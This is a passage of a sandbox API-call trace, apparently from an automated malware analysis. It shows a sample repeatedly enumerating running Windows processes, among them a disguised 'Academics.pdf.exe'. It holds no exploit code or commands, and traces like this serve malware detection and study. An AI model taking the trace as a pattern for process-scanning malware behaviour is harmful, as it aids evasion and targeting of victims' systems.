cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0301.670] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0301.671] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0301.672] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0301.673] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.674] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.674] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0301.675] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.676] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0301.677] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.678] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0301.679] CloseHandle (hObject=0x294) returned 1 [0301.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.679] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.679] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0301.685] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.686] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0301.687] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0301.688] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.689] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0301.690] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.691] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0301.692] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0301.693] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0301.693] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0301.694] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.695] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.696] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.697] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.698] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.699] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0301.699] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.700] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.701] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0301.702] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0301.703] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0301.704] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0301.705] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.705] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0301.706] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0301.707] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0301.708] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0301.709] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0301.710] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0301.711] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0301.711] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0301.712] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0301.713] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0301.714] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0301.715] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0301.716] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0301.716] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0301.717] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0301.718] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0301.719] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0301.720] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0301.720] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0301.721] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.722] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0301.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0301.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0301.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0301.727] CloseHandle (hObject=0x294) returned 1 [0301.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.727] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0301.729] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0301.731] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0301.732] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.733] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0301.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0301.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0301.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0301.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0301.737] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0301.738] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.741] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.742] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0301.743] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.744] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0301.745] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0301.745] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0301.746] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0301.747] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 